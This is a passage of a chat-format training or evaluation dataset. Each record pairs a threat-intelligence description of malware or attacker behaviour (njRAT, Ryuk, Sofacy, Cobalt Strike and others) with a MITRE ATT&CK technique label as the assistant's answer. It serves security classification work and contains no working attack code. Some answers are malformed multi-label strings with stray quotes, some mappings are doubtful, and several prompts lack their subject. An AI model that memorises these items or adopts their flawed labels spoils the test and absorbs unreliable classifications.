- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RainyDay can use a file exfiltration tool to collect recently changed files with specific extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 has functionality to copy itself to removable media."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Winnti for Windows dropper can place malicious payloads on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedGrace encrypts its C2 configuration files with AES in CBC mode."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy can capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linfo creates a backdoor through which remote attackers can retrieve system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses AES to encrypt certain information sent over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT uses Base64 encoding for C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following network activity observed from msiexec.exe illustrates how the malware leveraged a signed and verified certification from Sectigo RSA Code Signing CA to propagate"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell is injected into a shared SVCHOST process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has written AES-encrypted and Base64-encoded configuration files to disk."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can enumerate the hostname, domain, and IP of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dropped and executed tools used for password cracking, including Hydra."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Action RAT can use `cmd.exe` to execute commands on an infected host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a feature to create local user accounts."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle can decrypt its payload using RC4, AES, or one-byte XORing."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware supports timestomping."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated with many sources such as Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, and Internet Explorer."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can load and call DLL functions."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the time of discovery TEARDROP was a novel concoction: never-before-seen, possibly even tailor-made for this attack. TEARDROP runs in-memory but it does register a Windows service, which involves editing the registry"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore can execute JavaScript by injecting it into the victim's browser."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As a Windows Management Instrumentation (WMI) client application, it initializes COM and connects to the \\\\root\\cimv2 namespace to use the IWbemServices pointer and make WMI requests. The code executes wql queries (“wql” is “sql for wmi”, a subset of sql) to gather victim host details, like the query “SELECT Description, Manufacturer, Name, ProcessorId FROM Win32_Processor”. Here are several queries from the BlackEnergy2 plugin code"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The discovery modules used with can collect information on process details."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can delete folders and files including overwriting its executable with legitimate programs."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Privacy` Registry key."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nltest may be used to enumerate trusted domains by using commands such as \"nltest /domain_trusts\"."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon executes functions using rundll32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key/value: HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1"
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Excel\\Security\\AccessVBOM\\\" to determine if the security setting for restricting default programmatic access is enabled."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa used \"cmd.exe\" for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepySnail can connect to C2 for data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has been observed to query the registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\" and the value \"InstallLanguage\". If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423 (Belarusian), it stops execution."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TClient will use SSL to connect to Tropic Trooper’s C&C server. This allows Tropic Trooper’s operators to easily change/update the C&C server and configure other values"
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used Base64 to encode strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mori can resolve networking APIs from strings that are ADD-encrypted."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has used legitimate applications to side-load malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection"
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes', 'T1132.001 - Data Encoding: Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic is encrypted using bitwise NOT and XOR operations."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has relied upon users clicking on a malicious link delivered through phishing."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DDKONG downloads and uploads files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The downloaded Stage3 is written in C# as in Stage2, and an obfuscation tool called Eazfuscator is detected by exeinfoPE"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to capture screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk, along with the multipurpose, cyberespionage-related BlackEnergy, was used in cyberattacks in late December 2015 against Ukraine’s energy sector as well as its banking, rail, and mining industries. The malware has since metamorphosed into a threat used for digital extortion, affecting Windows and Linux platforms"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The TrickBot module used for credential harvesting is pwgrab64. As with all modules launched by the TrickBot core, pwgrab64 is installed into a subfolder, usually named either “modules” or “data,” and modified the following registry value"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. Aside from that, startup is performed by loading Cobalt Strike into the main memory without saving to the file system. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP/HTTPS/DNS modules and SMB modules. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. To prevent this threat, the company should configure filter rules to detect the above-mentioned tools on the corporate network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uses WMI to perform process monitoring."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file /tmp/.rOuYXzdOF was most likely used as a mutex, ensuring only one copy of Netwire could run at a time. Next, .default.conf was a configuration file storing data required for Netwire to communicate with command and control. On the Windows side, this is usually stored in the Registry"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to discover local NetBIOS domain names."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used a Visual Basic script that checked for internet connectivity."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has infected victim machines through compromised websites and exploit kits."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the same time, Enc.exe will start the encryption routine and append “. jcry ” as file extension to the encrypted file."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1041 - Exfiltration Over C2 Channel', 'T1071 - Application Layer Protocol', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KEYMARBLE can execute shell commands using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's Blowfish key is encrypted with a public RSA key."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can obtain a list of processes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can inject into the `svchost.exe` process for execution."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used powershell.exe to download and execute scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak’s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat can list directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used \"ipconfig\" to identify the network configuration of a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The files we recovered indicate they do it by executing a script file, which uses the Sysinternals psexec tool to move laterally by trying to copy it to every machine they can reach:"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro prepends the string -----BEGIN CERTIFICATE----- to the beginning of the base64 encoded payload and appends -----END CERTIFICATE----- to the end of the data. The macro then writes this data to a text file in the C:\\Programdata folder using a random filename with the .txt extension. The macro then uses the command certutil -decode to decode the contents of this text file and outputs the decoded content to a randomly named file with a .exe extension in the C:\\Programdata folder. The newly dropped executable is a loader Trojan responsible for installing and running the payload of this attack. Overall, SofacyCarberp does initial reconnaissance by gathering system information and sending it to the C2 server prior to downloading additional tools to the system. These differences include a new hashing algorithm to resolve API functions and to find running browser processes for injection, as well as changes to the C2 communication mechanisms as explained in detail within the appendix. Open-source Delivery Document Generator It appears that Sofacy may have used an open-source tool called Luckystrike to generate the delivery document and/or the macro used in this attack. Luckystrike, which was presented at DerbyCon 6 in September 2016, is a Microsoft PowerShell-based tool that generates malicious delivery documents by allowing a user to add a macro to an Excel 